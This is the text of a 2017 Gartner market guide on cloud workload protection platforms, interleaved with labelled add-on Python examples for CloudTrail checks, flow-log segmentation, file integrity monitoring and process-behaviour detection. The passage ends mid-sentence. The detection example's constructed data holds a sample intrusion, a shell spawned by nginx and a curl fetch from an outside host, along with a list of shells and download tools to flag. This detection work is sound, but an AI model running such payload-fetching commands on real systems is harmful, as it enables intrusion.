
Market Guide for Cloud Workload Protection Platforms
Published: 22 March 2017 ID: G00302941

Analyst(s): Neil MacDonald

Server workloads in modern hybrid data centers use private and public
cloud computing and require a protection strategy different from end-user-
facing devices. Security and risk management leaders should use risk-
based models to prioritize evaluation criteria for cloud workload protection
platforms.

Key Findings
Enterprises are implementing hybrid data center architectures, with workloads running on-
premises and in multiple cloud infrastructure-as-a-service providers.
The increasing adoption of containers complicates workload protection strategies.
Elastic, cloud-native applications have unique security needs. Legacy on-premises security
agents are not designed to perform at cloud scale and may have licensing models that are
incompatible with elastic cloud workloads.
Cloud workload protection platform vendors are emerging to address these requirements,
including many smaller startups, which is confusing buyers.
Signature-based, anti-malware scanning provides little value for most server workloads.

Recommendations
Security and risk management leaders tasked with acquisition, strategizing and planning should:

Not assume end-user endpoint protection platforms are best-suited to private and public cloud
workloads, which have vastly different protection requirements.
Require vendors to support the visibility and control of workloads that span physical and virtual
machines, containers and multiple public cloud IaaS, all from a single policy management
framework and console.
Require vendors to support native integration with VMware, Amazon Web Services and
Microsoft Azure APIs and labeling for policy management.
Disable antivirus on most servers, and use application control and whitelisting as the primary
protection strategy, unless the server hosts a file-sharing repository.
Require vendors to API-enable security protection functions to be automated and integrated
into DevSecOps-style workflows for scanning prior to deployment.

Strategic Planning Assumptions


By 2019, 60% of server workloads will use application control in lieu of antivirus, which is an
increase from 30% in 2017.

By 2018, three of the top five cloud workload protection platform (CWPP) vendors will have added
explicit support for container visibility and policy enforcement on a per-container-basis.

Market Definition
The market for CWPPs is defined by workload-centric security protection solutions, which are
typically agent-based. They address the unique requirements of server workload protection in
modern hybrid data center architectures that span on-premises, physical and virtual machines
(VMs) and multiple public cloud infrastructure as a service (IaaS) environments. Ideally, they also
support container-based application architectures. Vendors competing in this market offer one or
more of the following capabilities for hybrid cloud workload protection.

Core Capabilities:

Configuration and vulnerability management
Network segmentation, isolation and traffic visibility
System integrity measurement, attestation and monitoring
Application control
Memory protection, including exploit prevention

Extended Capabilities:

IaaS data-at-rest encryption and encryption key management
Endpoint detection and response for servers, e.g., a host-based intrusion detection system
(HIDS)
Host intrusion prevention systems (HIPSs) and vulnerability shielding
Network encryption and tunneling services
Deception capabilities

Page 2 of 25 Gartner, Inc. | G00302941


Anti-malware scanning

Capabilities that augment/verify foundational operational controls:

Vulnerability and configuration assessment
Multifactor authentication for administrators and basic privileged account management
Log management and monitoring

Market Direction
Modern data centers support workloads that run in physical machines, VMs, containers, private
cloud infrastructure and almost always include some workloads running in one or more public cloud
IaaS providers. Hybrid CWPP offerings provide information security leaders with visibility and
control across all of these environments with a "single pane of glass": a consistent way to
manage policy and monitor for issues.

Although traditional endpoint security vendors (see "Magic Quadrant for Endpoint Protection
Platforms") may tell potential customers to use the same product and set of controls to protect
server workloads as they do for protecting end-user desktops, this won't work (at least not well).
The protection and compliance requirements of private and public cloud workloads are different
enough that the market has bifurcated to address distinct market needs: those that protect server
workloads and those that protect devices that directly support end users, such as desktops,
laptops and mobile devices. To directly address the unique requirements of cloud workload
protection, several of the traditional endpoint protection platform (EPP) vendors have developed
specific CWPP offerings, and new point solution vendors have emerged.

Several key trends are affecting the growth and development of the CWPP market.

Server workloads have fundamentally different protection requirements, especially in public
clouds. Servers lead very different lives than end-user-facing endpoints. Although end users routinely
interact with unknown executable code, server workloads are almost always restricted to a well-
defined set of activities. In VM environments, this is typically one application per VM. In container-
type environments, this can be down to a single process or application service. Thus, it is more
effective to apply a default-deny application control (also referred to as whitelisting) model to server
workloads than it is on end-user-facing endpoints.

There are other significant differences. Cloud-style applications tend to scale elastically, requiring
protection to scale up and down on demand with usage-based licensing models that reflect this.
Simply running agents designed for on-premises servers and hoping these will work in IaaS is not
sufficient.

Public cloud IaaS also changes the requirements. For example, encryption of data at rest should be
considered a mandatory best practice for public cloud-based servers (see "How to Make Cloud
IaaS Workloads More Secure Than Your Own Data Center"), although this is rarely a requirement in
on-premises data centers. Finally, most organizations have a stated intention to standardize on at
least two IaaS providers, in addition to private cloud infrastructure, creating the need for solutions
that support hybrid and heterogeneous cloud environments.

There is a changing threat environment. Another trend is the increased focus on server workload
protection from advanced targeted threats that bypass traditional perimeter and signature-based
protection. Typically, these attacks are financially motivated and target server and application
workloads as a way to get to sensitive data or transactions. Advanced attacks have driven several
key changes in server workload protection:

Protection models that don't rely on signatures. The primary protection strategy for CWPP
(including container-based implementations) will be based on application control: restricting
what applications can run to a predefined set based on policy, so that all other code,
malicious or not, is blocked by policy.
The need for network traffic isolation, segmentation and visibility. Advanced attacks will
gain a foothold on one system and then spread laterally (east/west) within data centers. The
ability to more granularly segment data center traffic is another key requirement. To help
organizations understand application flows, visibility and visualization of these flows is also an
emerging use case for CWPP.

There is a need for deployment speed. In many cases, cloud server workload instantiation will be
driven by templates and scripts, requiring security protection vendors to open up their protection
capabilities via APIs for automated provisioning. DevOps operating models need to incorporate
security protection as well (see "DevSecOps: How to Seamlessly Integrate Security Into DevOps").
As a result, security requirements captured during development can be expressed in security
controls at runtime, without the need for expensive "human middleware" to program the security
infrastructure. This creates a need for security controls to become automatable and adaptive to
scale up and down, as workloads come and go. Enterprises can't slow down to rely on a human
being to go to a console and set policy. This drives a need for full programmability of the protection
infrastructure via APIs.

Application development is changing. Combined with the need for deployment speed, developers
have embraced containers as a way to slipstream the delivery of new services from development
into production quickly and with high fidelity. Securing container-based deployments also changes
the requirements for CWPPs to, at a minimum, provide visibility into containers (see "Security
Considerations and Best Practices for Securing Containers"). Ideally, CWPPs should protect
containers as just another abstraction and option for deployment at runtime. Containers should be
protected throughout this life cycle. As a best practice, they should be scanned for known
vulnerability and configuration issues before they are released into production. Some of the leading
CWPP vendors don't yet have container support. To fill this gap, several new vendors in the CWPP
market are designed solely for container-based development and deployments.

There is a shift toward immutable infrastructure. Ideally, as enterprises change their application
architectures to containers and phase out legacy applications, the enterprise should not directly
manage live workloads and systems at all. Live systems will be considered immutable: an
operational model in which no configuration changes, patches or software updates are allowed on
production systems. Patches and updates are applied to the base images and layers, then the
production workloads are replaced, rather than serviced. An immutable infrastructure mindset will
change traditional security models. With immutable infrastructure in well-managed environments,
CWPP protection will shift to a focus on application control and container lockdown at runtime, with
a stronger emphasis on scanning in development, before workloads are deployed into production.

The legal and regulatory environment is changing. Many server workload protection
requirements are influenced or are direct requirements to comply with legal and regulatory
frameworks. A good example is the requirements for the protection of Payment Card Industry (PCI)-
related workloads: specifically, file integrity monitoring, HIDS, patch management, anti-malware
scanning or whitelisting (see Note 1), and network isolation. Likewise, the pending requirements of
the European Union's (EU's) General Data Protection Regulation (GDPR) have reignited concerns
around data residency, driving interest in data-at-rest encryption in public cloud IaaS, with
customer-managed keys architected so that the cloud provider has no access to the keys.

These trends are creating requirements that are significantly different from traditional end-user-
facing endpoints and traditional physical servers. To address this, several new vendors with
dedicated CWPP point solutions have emerged targeting the needs of hybrid cloud server workload
protection. Information security leaders and architects must understand that simply running an
agent-based solution designed for dedicated physical servers in newer hybrid cloud and container
architected server applications won't work.

Market Analysis
A large number of vendors offer CWPP solutions that vary widely in their capabilities. We
recommend that organizations apply a risk-based security strategy when developing their server
workload protection strategy. All workloads do not require equal levels of protection. Some
workloads will host less-sensitive data and require fewer controls. Others with extremely sensitive
data are likely to use more controls. Others may be protected behind network-based controls, such
as firewalling and intrusion prevention systems (IPSs), and require less protection from within the
host. With this in mind, we have created a hierarchy of workload protection needs (see Figure 1) to
help enterprises prioritize their security investments and to help evaluate vendors with capabilities in
this market:


Figure 1. Cloud Workload Protection Controls Hierarchy

Source: Gartner (March 2017)

Figure 1 graphically illustrates our recommended prioritization of security controls for hybrid cloud
server workload protection. Capabilities toward the bottom of the pyramid are more critical
(foundational), whereas those toward the top are less important. However, depending on the
specific risk profile of the server and the legal/regulatory requirements of the workload and the
geography, enterprises may weight their evaluations differently. Some of the capabilities shown may
be supplied by the OS provider, cloud IaaS provider or another tool within IT operations (e.g.,
configuration and patch management). Finally, servers hosting virtual desktop infrastructure (VDI)
are a different use case, and would use a more-traditional end-user endpoint protection strategy
(see Note 2).

Start with solid operational hygiene. At the bottom of Figure 1 is a square box of foundational
operational capabilities. Solid server security starts with good operational hygiene. For many
organizations, the operational processes and technical solutions for delivering these capabilities are
already in place and should be extended to cloud-based workloads, including:

Restricted access to the server. Server workloads should have restricted access both
physically and virtually, restricting who or what can reach the server.
Restricted ability for arbitrary code to be placed onto the server. Local browsers and email
clients should be removed or disabled. On physical servers, USB ports, Wi-Fi and 3G modems, and
similar ways to introduce or remove data should be removed or disabled.
Tight controls around administrative access to the server workloads. Multifactor
authentication or other forms of strong authentication beyond simple usernames and
passwords should be mandatory. In addition, strict controls and processes around the issuance
of administrative credentials should be put in place, using privileged account management
(PAM) systems (see "Market Guide for Privileged Access Management").
Well-defined change management processes. Ideally, these changes would be controlled
and managed in conjunction with a PAM system. If runtime changes are allowed at all, changes
to workload images should follow a defined change management control process linked to the
trouble-ticketing system.
Log management. The server workload OS and applications logs should be gathered into a log
management system or a security information and event management (SIEM) system. The PAM
logs should be managed as well. In virtualized and cloud environments, logs of the activities of
cloud administrators should also be managed, for example, Amazon Web Services (AWS)
CloudTrail logs.
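As an added example (not part of the Gartner guide, and not any vendor's code), the following Python applies three of the hygiene points above to AWS CloudTrail records: console logins by the root account or without multifactor authentication, API calls that weaken the audit trail itself, and security-group changes that open a port to the whole internet. The field names (eventName, userIdentity, additionalEventData.MFAUsed, requestParameters) follow CloudTrail's documented record layout; the four records, the severity labels and the lists of watched API calls are this example's own constructions, not a complete rule set.

```python
"""Flag risky cloud-administrator activity in AWS CloudTrail-style records.

Added example, not part of the Gartner guide. Field names follow CloudTrail's
documented record layout; the sample records below are constructed.
"""
import json

# Constructed sample: one CloudTrail record per line.
SAMPLE_CLOUDTRAIL = r'''
{"eventTime":"2017-03-22T09:01:11Z","eventName":"ConsoleLogin","userIdentity":{"type":"IAMUser","userName":"alice"},"sourceIPAddress":"203.0.113.10","additionalEventData":{"MFAUsed":"Yes"},"responseElements":{"ConsoleLogin":"Success"}}
{"eventTime":"2017-03-22T09:05:42Z","eventName":"ConsoleLogin","userIdentity":{"type":"Root","arn":"arn:aws:iam::123456789012:root"},"sourceIPAddress":"198.51.100.7","additionalEventData":{"MFAUsed":"No"},"responseElements":{"ConsoleLogin":"Success"}}
{"eventTime":"2017-03-22T09:07:03Z","eventName":"StopLogging","eventSource":"cloudtrail.amazonaws.com","userIdentity":{"type":"IAMUser","userName":"bob"},"sourceIPAddress":"198.51.100.7"}
{"eventTime":"2017-03-22T09:09:30Z","eventName":"AuthorizeSecurityGroupIngress","eventSource":"ec2.amazonaws.com","userIdentity":{"type":"IAMUser","userName":"bob"},"sourceIPAddress":"198.51.100.7","requestParameters":{"groupId":"sg-0a1b2c3d","ipPermissions":{"items":[{"ipProtocol":"tcp","fromPort":22,"toPort":22,"ipRanges":{"items":[{"cidrIp":"0.0.0.0/0"}]}}]}}}
'''

# Watched API calls. Both sets are this example's choice, not a complete list.
LOGGING_TAMPER = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"}
NETWORK_CHANGE = {"AuthorizeSecurityGroupIngress", "AuthorizeSecurityGroupEgress"}


def world_open_rule(params):
    """True if a security-group change admits 0.0.0.0/0 or ::/0."""
    for perm in (params or {}).get("ipPermissions", {}).get("items", []):
        ranges = perm.get("ipRanges", {}).get("items", []) + perm.get("ipv6Ranges", {}).get("items", [])
        if any(r.get("cidrIp") == "0.0.0.0/0" or r.get("cidrIpv6") == "::/0" for r in ranges):
            return True
    return False


def check_record(rec):
    """Return (severity, message) findings for a single CloudTrail record."""
    findings = []
    ident = rec.get("userIdentity", {})
    who = ident.get("userName") or ident.get("arn") or ident.get("type", "unknown")
    name = rec.get("eventName")
    src = rec.get("sourceIPAddress")
    if name == "ConsoleLogin":
        if ident.get("type") == "Root":
            findings.append(("high", f"root account console login from {src}"))
        if rec.get("additionalEventData", {}).get("MFAUsed") != "Yes":
            findings.append(("high", f"console login by {who} from {src} without MFA"))
    elif name in LOGGING_TAMPER:
        findings.append(("high", f"{who} called {name}: audit logging weakened"))
    elif name in NETWORK_CHANGE and world_open_rule(rec.get("requestParameters")):
        group = rec["requestParameters"].get("groupId")
        findings.append(("medium", f"{who} opened security group {group} to the internet"))
    return findings


def scan(text):
    """Parse newline-delimited records and return [(eventTime, severity, message)]."""
    results = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        for sev, msg in check_record(rec):
            results.append((rec.get("eventTime"), sev, msg))
    return results


if __name__ == "__main__":
    for when, sev, msg in scan(SAMPLE_CLOUDTRAIL):
        print(f"{when} [{sev}] {msg}")
```

In a real deployment the records arrive as gzipped JSON batches under a "Records" key in the trail's S3 bucket (or via CloudWatch Logs); the per-record check is the same once a batch is unpacked. The StopLogging finding is the one to page on: an administrator account that first disables the trail and then opens SSH to the world, as in the constructed sample, is the sequence a PAM-issued credential should never be able to perform unchallenged.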

Above this foundational operational hygiene level of controls, the following controls should be
considered mandatory for the protection of server workloads:

Configuration and vulnerability management, ideally scanning before release into production
Network firewalling, segmentation and traffic visibility
System integrity monitoring/management
Application control (whitelisting)
Exploit prevention and memory protection

Beyond the capabilities listed above, there are other ways that server workloads may be further
protected. The need for additional protection will be based on multiple factors, including
compliance requirements; the sensitivity of the workload protected; the presence of other mitigating
controls, such as a network firewall or network IPS; and whether or not the server can be patched in
a timely manner; and the risk tolerance of the enterprise.

Cloud Workload Protection Platform Details


The following is a more detailed description of what we consider to be the key capabilities of
solutions that compete in this market. The core components of a server protection platform are:

Hardening, configuration and vulnerability management. Unnecessary components, such as


Telnet, FTP and other services, should be removed. Images should be hardened using industry
standard guidelines as the starting point. This layer may be managed by IT operations, but
information security is responsible for ensuring that systems are hardened and configured according
to the organization's standard guidelines, and that systems are kept patched and up-to-date in a
timely manner, according to the organization's patching policies. In many cases, this functionality
will be achieved using an external scanning tool or service, for example, Qualys, Tenable Network
Security (Nessus) and Rapid7. Some of the CWPP solutions in this Market Guide can also assess
the system configuration and vulnerability from the "inside out," using their agents to provide this
visibility. Ideally, vendors would provide automatic policy recommendations for workload
hardening based on the workload's contents.

Workload segmentation, traffic visibility and optional network traffic encryption. A foundation
of solid workload security is isolation and segmentation of its ability to communicate with external
resources. Some of the workload protection solutions provide their own firewalling capabilities,
whereas others manage the built-in firewalls of Windows and Linux. The solution should support the
emerging requirement for "microsegmentation" (more-granular segmentation) of east/west traffic in
data centers. In addition, several of the solutions provide visibility and monitoring of the
communication flows. Visualization tools enable operations and security administrators to
understand flow patterns, set policies and monitor for deviations. Finally, several vendors offer
optional encryption of the network traffic (typically, point-to-point IPsec transport mode security
associations) among workloads for the protection of data in motion, and provide cryptographic
network isolation among workloads.
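The flow-visibility use case described above, reduced to code as an added example (not from the guide or any vendor): it reads flow records in the AWS VPC Flow Log default field order, maps each address to a tier, and reports two things: flows the tier-level policy does not allow, and policy rules that no flow ever exercised. The addresses, the tier assignments and the policy are constructed for illustration; in practice the tier map would come from provider tags or security-group membership.

```python
"""Check observed east/west flows against a tier-level segmentation policy.

Added example, not the guide's own code. Flow lines use the AWS VPC Flow Log
default field order; addresses, tier assignments and policy are constructed.
"""

# Constructed: which workload (by address) belongs to which tier.
TIER_OF = {
    "10.0.1.10": "web", "10.0.1.11": "web",
    "10.0.2.20": "app",
    "10.0.3.30": "db",
    "10.0.9.90": "bastion",
}

# Constructed allow-list of (source tier, destination tier, destination port).
# Everything not listed is a deviation: east/west traffic is default deny.
POLICY = {
    ("web", "app", 8080),
    ("app", "db", 5432),
    ("bastion", "web", 22),
    ("bastion", "app", 22),
    ("bastion", "db", 22),
}

# Constructed flow records: version account eni src dst srcport dstport proto
# packets bytes start end action log-status.
SAMPLE_FLOWS = """\
2 123456789012 eni-0a1b 10.0.1.10 10.0.2.20 49152 8080 6 20 4000 1490175600 1490175660 ACCEPT OK
2 123456789012 eni-0a1b 10.0.2.20 10.0.3.30 49153 5432 6 30 9000 1490175600 1490175660 ACCEPT OK
2 123456789012 eni-0a1b 10.0.1.11 10.0.3.30 49154 5432 6 3 180 1490175600 1490175660 ACCEPT OK
2 123456789012 eni-0a1b 10.0.1.10 10.0.1.11 49155 22 6 5 420 1490175600 1490175660 ACCEPT OK
2 123456789012 eni-0a1b 10.0.9.90 10.0.2.20 49156 22 6 12 1500 1490175600 1490175660 ACCEPT OK
2 123456789012 eni-0a1b 10.0.3.30 10.0.2.20 5432 49153 6 25 30000 1490175600 1490175660 ACCEPT OK
2 123456789012 eni-0a1b 10.0.5.50 10.0.3.30 49158 5432 6 2 120 1490175600 1490175660 ACCEPT OK
2 123456789012 eni-0a1b 10.0.1.10 10.0.3.30 49159 3306 6 1 60 1490175600 1490175660 REJECT OK
"""


def parse_flows(text):
    """Yield (src, dst, srcport, dstport) for accepted flows with valid data.
    Rejected flows were already stopped by the provider's security groups, and
    NODATA/SKIPDATA lines carry nothing usable."""
    for line in text.splitlines():
        f = line.split()
        if len(f) < 14 or f[13] != "OK" or f[12] != "ACCEPT":
            continue
        yield f[3], f[4], int(f[5]), int(f[6])


def is_return_traffic(src_tier, dst_tier, srcport, policy):
    """Flow logs record both halves of a TCP session. The server's reply has
    the service port as *source* port, so a flow whose reversed tuple is
    permitted is the return half of an allowed session, not a new connection."""
    return (dst_tier, src_tier, srcport) in policy


def evaluate(text, policy=POLICY, tier_of=TIER_OF):
    """Return (deviations, unexercised): deviations are (src, dst, dstport)
    tuples the policy does not cover (hosts without a tier count as 'unknown');
    unexercised are policy rules no flow used, candidates for tightening."""
    deviations, exercised = set(), set()
    for src, dst, srcport, dstport in parse_flows(text):
        src_tier = tier_of.get(src, "unknown")
        dst_tier = tier_of.get(dst, "unknown")
        rule = (src_tier, dst_tier, dstport)
        if rule in policy:
            exercised.add(rule)
        elif is_return_traffic(src_tier, dst_tier, srcport, policy):
            continue
        else:
            deviations.add((src, dst, dstport))
    return sorted(deviations), policy - exercised


if __name__ == "__main__":
    devs, unused = evaluate(SAMPLE_FLOWS)
    for src, dst, port in devs:
        print(f"DEVIATION {src} ({TIER_OF.get(src, 'unknown')}) -> "
              f"{dst} ({TIER_OF.get(dst, 'unknown')}):{port}")
    for rule in sorted(unused):
        print(f"UNEXERCISED rule {rule}")
```

Two caveats a practitioner would attach. The return-traffic rule is a convenience for log analysis only: a host that is already compromised can emit packets whose source port is a service port, so enforcement still belongs in a stateful host firewall, and this check is for visibility. Every deviation it reports, including traffic from an address with no tier assignment (the constructed 10.0.5.50), is a segmentation gap to close rather than a log line to suppress, and every unexercised rule is an allowed path nobody uses and therefore a candidate for removal.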

System integrity monitoring/management. Capabilities here span two areas:

The ability to measure the BIOS, hypervisor, VM and container system images before they are
loaded; this is typically achieved using trust measurements rooted in hardware for physical
systems. In the public cloud, this will be limited to measuring the integrity of the system images
and containers before mount.
The real-time monitoring of the integrity of critical system files after the workloads are booted.

More-advanced solutions also monitor the integrity of the Windows registry, startup folders, drivers
and bootloader. File integrity monitoring (FIM) is a requirement of multiple regulations, including PCI,
and is a precursor to more-advanced endpoint detection and response (EDR), similar to the
capabilities discussed below. Like antivirus, the value of FIM alone is questionable; however, it may
be required by auditors.
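The second capability, runtime monitoring of critical files, is at bottom a baseline-and-compare loop. As an added example (not the guide's code, and not any product's), the Python below records a SHA-256 digest, the permission bits and the owner of every file under a set of roots, then classifies what changed on the next pass. The tree it builds in demo() is constructed; the roots a real deployment would watch (/etc, /bin, the application's install path, the container image's layers) are the operator's choice.

```python
"""File integrity monitoring (FIM): baseline a tree, then report what changed.

Added example, not the guide's own code. It records a SHA-256 digest, the
permission bits and the owner of every regular file (and the target of every
symlink) under the watched roots; the tree built in demo() is constructed.
"""
import hashlib
import os
import shutil
import stat
import tempfile


def sha256_file(path, chunk=1 << 20):
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(roots):
    """Map every file under roots to (digest, mode bits, uid, gid).
    Symlinks are recorded by target rather than followed, so a link repointed
    at a different file is reported even if neither file changed."""
    entries = {}
    for root in roots:
        for dirpath, _dirs, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                st = os.lstat(path)
                if stat.S_ISLNK(st.st_mode):
                    digest = "symlink:" + os.readlink(path)
                elif stat.S_ISREG(st.st_mode):
                    digest = sha256_file(path)
                else:
                    continue  # sockets, fifos and devices are out of scope here
                entries[path] = (digest, stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)
    return entries


def compare(baseline, current):
    """Classify differences: added, removed, modified (content differs) and
    attr_changed (identical content, but mode or owner differs)."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified, attr_changed = [], []
    for path in sorted(set(baseline) & set(current)):
        old, new = baseline[path], current[path]
        if old[0] != new[0]:
            modified.append(path)
        elif old[1:] != new[1:]:
            attr_changed.append(path)
    return {"added": added, "removed": removed,
            "modified": modified, "attr_changed": attr_changed}


def demo():
    """Build a constructed tree, baseline it, tamper with it, and return the
    findings with paths made relative to the temporary root."""
    base = tempfile.mkdtemp(prefix="fim-demo-")
    try:
        os.makedirs(os.path.join(base, "bin"))
        os.makedirs(os.path.join(base, "etc"))
        files = {"bin/app": b"\x7fELF original binary",
                 "etc/app.conf": b"listen=8080\n",
                 "etc/old.conf": b"obsolete\n"}
        for rel, data in files.items():
            p = os.path.join(base, rel)
            with open(p, "wb") as f:
                f.write(data)
            os.chmod(p, 0o644)
        baseline = snapshot([base])

        # Tamper: swap the binary, loosen a config's mode, add a file, delete one.
        with open(os.path.join(base, "bin/app"), "wb") as f:
            f.write(b"\x7fELF trojaned binary")
        os.chmod(os.path.join(base, "etc/app.conf"), 0o666)
        with open(os.path.join(base, "etc/new.conf"), "wb") as f:
            f.write(b"debug=true\n")
        os.remove(os.path.join(base, "etc/old.conf"))

        changes = compare(baseline, snapshot([base]))
        return {k: [os.path.relpath(p, base) for p in v] for k, v in changes.items()}
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Where the baseline lives matters as much as the comparison: keep it off the host, or signed, because an attacker who can rewrite files can otherwise also rewrite the record of what they looked like. Mode and ownership changes with identical content are reported separately since a loosened permission on a config or a setuid bit on a binary is a common escalation step that a content-only FIM never sees, and it is exactly the kind of change an immutable-infrastructure model says should never happen on a live system.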

Application control (whitelisting). Most workloads in on-premises VMs and in public cloud IaaS
run a single application. This is almost always the case with containers hosting microservices-based
applications. The use of whitelisting to control what executables are run on a server provides an
extremely powerful security protection strategy. All malware that manifests itself as a file to be
executed is blocked by default. Many CWPP solutions provide built-in application control
capabilities, or dedicated point solutions offer them. Alternatively, the built-in application control
capabilities of the OS might be used, such as software restriction policies, AppLocker and Device
Guard with Windows, or SELinux, or AppArmor with Linux. Some of the application control vendors
can further constrain the runtime behavior of whitelisted applications, using more-granular policy
enforcement.

Exploit prevention and memory protection. Application control solutions are fallible and should be
combined with exploit prevention and memory protection capabilities, either from the OS (for
example, ASLR, see "Address Space Layout Randomization" [Wikipedia], and seccomp, see
"seccomp" [Wikipedia]), from the application control solution, or from a third party, to protect from the
scenario in which a vulnerability in a whitelisted application is attacked, and the injected code runs
entirely from memory and doesn't manifest itself as a separately executed and controllable file
(referred to as fileless malware). Note that the two OS examples work at different stages: ASLR
hardens the memory layout against the exploit itself, whereas seccomp limits the system calls the
process may make, constraining what injected code can do once it runs. In addition, exploit
prevention and memory protection solutions can provide protection from attacks, without the
overhead of traditional, signature-based antivirus solutions, and can be used as a mitigating control
when patches are not available.

Additional CWPP layers include:

IaaS data-at-rest protection. Encryption of data at rest should be a standard best practice for
workloads running in public cloud IaaS (see "How to Make Cloud IaaS Workloads More Secure
Than Your Own Data Center"). With the use of Intel's AES-NI for cryptographic operation
acceleration, the impact on performance is minimal. In addition, many enterprises are making this a
standard requirement in their on-premises data centers. We have not made this a core requirement
for CWPP selection, because many OSs now provide full drive encryption for free and support a
"headless" mode specifically for server protection scenarios. In addition, Amazon also provides free
full-volume encryption in AWS (see "Amazon EBS Encryption"), as well as free solutions for RDS
and S3. Microsoft provides a similar capability with Azure Disk Encryption (see "Cloud Security
Controls Series: Encrypting Data at Rest"). With any encryption, there is a need for the secure
storage and management of encryption keys, and the need to support customer-managed keys.
More-advanced solutions support features such as key management, cross-cloud encryption and
automatic key rotation.

Server EDR for behavioral monitoring. Beyond the core system integrity monitoring discussed
above, this type of monitoring looks at behaviors such as network communications, processes
launched, files opened and log entries for behavior patterns that indicate malicious activity,
including within containers. Another technique is to establish patterns of expected behaviors from
whitelisted applications and look for deviations in behavior. In addition, several of the EDR vendors
specifically target server workload protection use cases (see "Market Guide for Endpoint Detection
and Response Solutions"). These capabilities are focused on detection and response, rather than
prevention of attacks. Monitoring server workloads for anomalous behavior should be considered a
best practice, although some organizations will achieve this with network-based monitoring, rather
than host-based agents. Thus, we haven't made this a core requirement of CWPP. Another common
use case will be to quickly scan all systems for the presence of a specific file by name or hash in the
event of an outbreak. This is a legacy vestige of signature-based antivirus scanning, but is used in
detection/response scenarios.
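Establishing expected behaviour for whitelisted applications and alerting on deviations, as an added example (not from the guide or from any EDR product): a learning window yields the parent-to-child process launches each container image normally performs, and a later window is checked against that baseline, with shells and download tools treated as never acceptable children of a service regardless of what the baseline says. The event layout (one JSON object per line with time, host, image, parent, child and argv fields) and the events themselves are constructed; a real pipeline would be fed from auditd, eBPF or the agent's own process telemetry with per-container attribution.

```python
"""Server EDR-style detection: learn which child processes each whitelisted
service normally launches, then flag launches that deviate.

Added example, not the guide's own code. The event layout and the events are
constructed; the field names are this example's assumption.
"""
import json
from collections import defaultdict

# Constructed learning window: ordinary behaviour of two container images.
LEARNING_WINDOW = r'''
{"time":"2017-03-20T01:00:00Z","host":"node1","image":"web/nginx:1.11","parent":"/usr/sbin/nginx","child":"/usr/sbin/nginx","argv":"nginx: worker process"}
{"time":"2017-03-20T01:00:01Z","host":"node1","image":"api/gunicorn:19","parent":"/usr/local/bin/gunicorn","child":"/usr/local/bin/gunicorn","argv":"gunicorn: worker [app]"}
{"time":"2017-03-20T02:00:00Z","host":"node1","image":"api/gunicorn:19","parent":"/usr/local/bin/gunicorn","child":"/usr/bin/pg_dump","argv":"pg_dump --schema-only app"}
'''

# Constructed monitoring window: normal activity plus a web-shell style intrusion.
MONITORING_WINDOW = r'''
{"time":"2017-03-22T10:00:00Z","host":"node1","image":"web/nginx:1.11","parent":"/usr/sbin/nginx","child":"/usr/sbin/nginx","argv":"nginx: worker process"}
{"time":"2017-03-22T10:00:07Z","host":"node1","image":"web/nginx:1.11","parent":"/usr/sbin/nginx","child":"/bin/sh","argv":"sh -c id"}
{"time":"2017-03-22T10:00:09Z","host":"node1","image":"web/nginx:1.11","parent":"/bin/sh","child":"/usr/bin/curl","argv":"curl http://198.51.100.7/x"}
{"time":"2017-03-22T10:05:00Z","host":"node1","image":"api/gunicorn:19","parent":"/usr/local/bin/gunicorn","child":"/usr/bin/pg_dump","argv":"pg_dump --schema-only app"}
{"time":"2017-03-22T10:06:00Z","host":"node1","image":"api/gunicorn:19","parent":"/usr/local/bin/gunicorn","child":"/usr/bin/logrotate","argv":"logrotate /etc/logrotate.conf"}
'''

# Children a network-facing service should never spawn, whatever the baseline says.
NEVER_FROM_SERVICE = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/curl",
                      "/usr/bin/wget", "/usr/bin/nc", "/usr/bin/python"}


def events(text):
    """Yield one event dict per non-empty line."""
    for line in text.splitlines():
        if line.strip():
            yield json.loads(line)


def learn(text):
    """Return {image: {(parent, child), ...}} from a window believed to be clean.
    Launches on the never-list are refused into the baseline, so a compromise
    that overlaps the learning window cannot whitelist itself."""
    baseline = defaultdict(set)
    for ev in events(text):
        if ev["child"] in NEVER_FROM_SERVICE:
            continue
        baseline[ev["image"]].add((ev["parent"], ev["child"]))
    return baseline


def detect(text, baseline):
    """Return [(time, image, severity, description)] for launches not in the
    baseline. An image with no baseline reports every launch, which is the
    right failure mode for a workload nobody has profiled."""
    alerts = []
    for ev in events(text):
        pair = (ev["parent"], ev["child"])
        if pair in baseline.get(ev["image"], set()):
            continue
        if ev["child"] in NEVER_FROM_SERVICE or ev["parent"] in NEVER_FROM_SERVICE:
            sev = "high"
        else:
            sev = "medium"
        alerts.append((ev["time"], ev["image"], sev,
                       f"{ev['parent']} -> {ev['child']} ({ev['argv']})"))
    return alerts


if __name__ == "__main__":
    baseline = learn(LEARNING_WINDOW)
    for when, image, sev, desc in detect(MONITORING_WINDOW, baseline):
        print(f"{when} {image} [{sev}] {desc}")
```

On the constructed data the nginx worker spawning a shell and the shell fetching a payload are reported as high, while gunicorn running logrotate is a medium-severity new pair for an analyst to confirm and then add to the baseline. These alerts are detection and response signals; stopping the shell from launching at all is the application control layer's job, which is why the guide treats the two as complementary rather than interchangeable.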

Host IPS including vulnerability-facing HIPS. Here, in addition to traditional network IPS
protection against known attacks, the CWPP vendor deeply inspects the incoming network traffic
stream for attacks against known vulnerabilities and prevents them. This layer may be redundant
with network IPSs protecting the data center; however, those may not protect from inter-VM or inter-
container-based attacks. HIPS becomes a valuable defense in depth control to shield from attacks
on a zero-day vulnerability until the patch can be applied or the VM/container is rebuilt and is used
by some organizations to reduce the frequency of server patching. This type of protection may also
be critical for protecting servers that cannot be patched easily or that are no longer supported with
patches by the vendor (such as Windows Server 2003, which fell out of support in 2015).

Deception. This emerging security protection capability creates fake vulnerabilities, systems,
shares, cookies, etc. If an attacker tries to attack these fake resources, it is a strong indicator that
an attack is in progress, as a legitimate user should not see or try to access these resources.
Deception technologies for network, application, endpoint and data are discussed in "Emerging
